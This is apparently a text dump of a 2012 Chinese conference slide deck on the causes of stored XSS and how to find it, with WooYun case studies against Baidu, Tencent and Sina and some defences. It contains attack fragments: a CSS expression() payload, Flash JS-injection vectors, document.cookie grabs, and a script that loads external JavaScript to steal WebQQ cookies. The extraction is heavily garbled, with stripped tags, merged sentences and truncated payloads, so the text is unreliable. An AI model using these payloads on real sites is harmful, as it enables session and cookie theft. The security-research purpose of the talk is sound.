存储型Xss成因及挖掘方 PPT高清版

如你所知,时至2012年,已然不是当年SQL满地,各种SA随手捡到的岁月了.

XSS越来越受到安全人员的重视,甚至连年被评为安全问题TOP3,无论在哪种安全评级标准体系中,均是很重要的部分.而GAINOVER作为wooyun白帽子中最牛的跨站师(没有之一).

他对XSS的挖掘和利用思路一直让众多白帽子好奇和激赏.

在2012年7月28日的第一届PKA V线下技术沙龙中,他的<存储型Xss成因及挖掘方法>也毫无争议的被众多与会者一致认为是最有价值分享,获得了全票通过的奖品–itouch一台.

文档简介

1、存储型XSS的成因及挖掘方法USERID: Gainover ( )GROUP: PKA V Group2012-7-28 | | 什么是XSS攻击？个人资料信息填写发表一篇日志发表一篇留言发表一篇评论提出一个问题回答一个问题.地址栏参数Dom属性攻击者注入恶意代码输入过滤输出过滤输入输出代码缺陷查看他人资料查看一篇日志查看一条留言查看一个评论查看一个问题查看一个答案点开一个链接点开一个邮件恶意代码执行受害者XSS模型当受害者变为攻击者时，下一轮受害者将更容易被攻击，威力更加明显！用户信息私密信息：日志，相片，邮件管理信息后台地址，管理员帐号信息甚至直接通过Ajax上传Shell客户端信息针对浏

2、览器缺陷实施攻击突破浏览器的域限制360, 傲游等浏览器的命令执行XSSXss蠕虫攻击DDoS攻击XSS攻击可以用来做什么？XSS的种类划分反射型XSSReflected XSS存储型XSSStored XSS恶意代码存放位置地址栏数据库恶意代码效果用户点击恶意链接打开时执行恶意代码，隐蔽性差 用户浏览带有恶意代码的正常页面时触发，隐蔽性强 ABCD12Non-persistentPersistent反射型XSSXSS Filter扫描器WAF产品但是危害越来越小.但是容易被扫.但是容易被 干掉XSS攻击的现状存储型XSS广泛存在存储型XSS的分类输出内容输出未过滤HTML-ContextJS-

3、ContextCss-Context输出已过滤Dom-Based操作evalinnerHTMLsetTimeoutsetIntervaldocument.write根据输出内容所处的位置来分类。经常需要二次过滤，但程序员忽略掉了。会自动发生一些转义Flash-based XSS其它/HTML文件HTML-Context 存储型XSS 及 防御wooyun-2010-07831 (random_) 百度某分站存储型XSS恶意代码的输入恶意代码的输出恶意代码的执行 替换为 判断存在 ,禁止提交JS-Context 存储型XSS 及其防御wooyun-2010-09111 (gainover) 点点

4、网存储型XSSJS-Context 存储型XSS的利用方式:闭合当前脚本，然后输入自定义内容。2. 根据JS上下文，构造正确的闭合。过滤 ,/ 替换为 (网易邮箱)根据实际情况，进行过滤。通常输出是字符串，在和之间，过滤,即可wooyun-2010-02321(Clouds) 百度贴吧存储型XSSJS-Context 存储型XSS 及其防御和中的XSS一样，过滤 和 而实际上，在HTML的属性里， 或 也是可以被执行的！进一步构造利用代码还需要将&过滤为&字符转义 / / / /CSS-Context 存储型XSS 及其防御通常情况下，可能会将过滤掉了，因而无法使用此方式1. 如果未做过滤，可

5、以用 的方式来调用CSS-Context 存储型XSS的利用方式:2. 直接根据CSS上下文构造闭合根据CSS类型对输出进行严格纠正例如：字体大小，必须为数字，图片地址不允许出现非法字符IE 6, 7, 8wooyun-2010-05967 (gainover, QQ空间存储型XSS)wooyun-2010-01101 (不开口, 网易微博换肤XSS)5. CSS-Context 存储型XSS 及其防御除了.中可以被写入CSS数据之外，还有其它位置也可以：2. 3. import data:,*%7bx:expression(if(!window.x)%7balert(1);window.

6、x=1%7d)%7D;1. 4. XXX(邮箱XSS的最爱)(部分内容参考 )Dom-based 存储型XSS 及其防御数据输出 我是输出 var x=$(x).value;var x=$(x).getAttribute(picurl);var obj=eval(+x+);$(result).innerHTML=x;DOM操作Dom-based 存储型XSS 及其防御name 字段是昵称，我们可以自行设置！接着我们做以下测试：Gainover Gainover对JS熟悉一点的则可能想到：于是，我们测试引号是否被过滤!Gainover Gainover放弃？var data=$(json).va

7、lue;wooyun-2010-09732 (gainover,百度首页XSS后门)Dom-based 存储型XSS 及其防御这一类漏洞经常出现的场景. 点击查看大图, 点击播放音乐,自动播放音乐。当用户点击查看大图的时候，执行的代码往往是：function test()alert($(pic).getAttribute(bigpic);$(bigimage).innerHTML=;wooyun-2010-02490 (gainover, 腾讯微博XSS)wooyun-2010-03317 (gainover,QQ邮箱音乐功能XSS)共同点：读取自定义属性，然后进行innerHTML操作。解决

8、方案：在读取属性之后，对属性中的特殊字符进行二次过滤。Dom-based 存储型XSS 及其防御.innerHTML=uXXXX 引发的惨 案wooyun-2010-08487 (gainover,腾讯WEBQQ聊天功能XSS)实际案例大多数厂商的做法将替换为将替换为/对进行二次过滤，替换 为 wooyun-2010-010167 (imlonghao, 搜狐微博 XSS)Flash-based 存储型XSS 及其防御Flash XSS存储型反射型正常的存储行为图片上传组件，视频播放器，音乐播放器 日志HTML未过滤，或过滤不严FLASH相册，对加载图片未判断其它一些有加载图片功能的FLASH应

9、用第三方插件第三方应用sameDomain策略Flash-based 存储型XSS 及其防御常规的Flash-based存储型XSS1. 最低级的漏洞Always & FLASH地址任何填写wooyun-2010-07684 (gainover, QQ空间礼物功能XSS)wooyun-2010-08354 (gainover,百度贴吧存储型XSS)2. 稍微进化一点Always & FLASH地址固定 &FLASH会调用外部图片或SWF文件正常的FLASH恶意FLASH参数?url=xxx.jpg读取配置文件xxx.jpgwooyun-2010-01768 (p.z, 新浪微博存储型XSS)w

10、ooyun-2010-01634 (p.z, 百度i贴吧存储型XSS)Flash-based 存储型XSS 及其防御3. 再次进化一点sameDomain + 同域名下反射型FLASH XSSsameDomain策略只允许使用同域名下的FLASH文件无法执行了吧，高枕无忧同域名下的缺陷型FLASH文件不同域名下的恶意FLASH文件程序员 B程序员 A被恶意利用同域名下允许上传FLASH文件某黑客wooyun-2010-03314 (gainover, QQ邮箱XSS)wooyun-2010-06103 (gainover, QQ空间存储型XSS)allowscriptaccess=sameDo

11、mainallowscriptaccess 默认属性Flash-based 存储型XSS 及其防御flash.external.ExternalInterface.call(JS代码)na vigateToURL(new URLRequest(JS代码)getURL(JS代码);loaderInfo.parametersxxx.swf?func = JS代码flashvars=func=JS代码 百度应用iframe iframe /xxx.swf合法的存储行为开发者 .黑客(本身是开发者)攻击反射型FLASH XSS1. FLASH开发人员缺乏安全意识(jwplayer, open flash

12、 chart, swfupload类程序)2. FLASH XSS 可以绕过主流浏览器的XSS Filter3. 传统扫描器不易扫描WooYun-2012-07050Wooyun-2010-07085(新浪微博，淘宝网Cookies盗取)Wooyun-2010-08318(gainover,百度应用XSS)Flash-based 存储型XSS 及其防御受害者 Iframe调用 (function()function j(w)window.s=document.createElement(script);window.s.src= /%2bw%2b.js;document.body.append

13、Child(window.s)j(jq);j(wq)()Flash xss /wq.js Cookie数据 获取vfwebqq参数 设置主题调用外部JS获取cookies劫持腾讯WEBQQ的持久劫持Wooyun-2010-07999存储型XSS 的挖掘方法1. 拿着各种XSS Vector填入到输入处，然后看页面是否有“执行”2. 输入一些可能没有被过滤的字符，/&XXXXX，看“侧漏”&3. 看功能异常，看报错&构造利用代码查明缺陷检查原因存储型XSS 的挖掘方法传统输入点各种表单，inputtext, textarea隐藏输入点Inputhidden客户端脚本过滤进一步测试浏览器调试工具 (F12)抓包工具HttpwatchFiddlerCharles4. 遭遇验证码看到一些提交的隐藏参数。存储型XSS 的利用找到一个XSS点之后alert(/xss/);alert(document.cookie);输入点长度限制突破长度限制漏洞的利用http-only co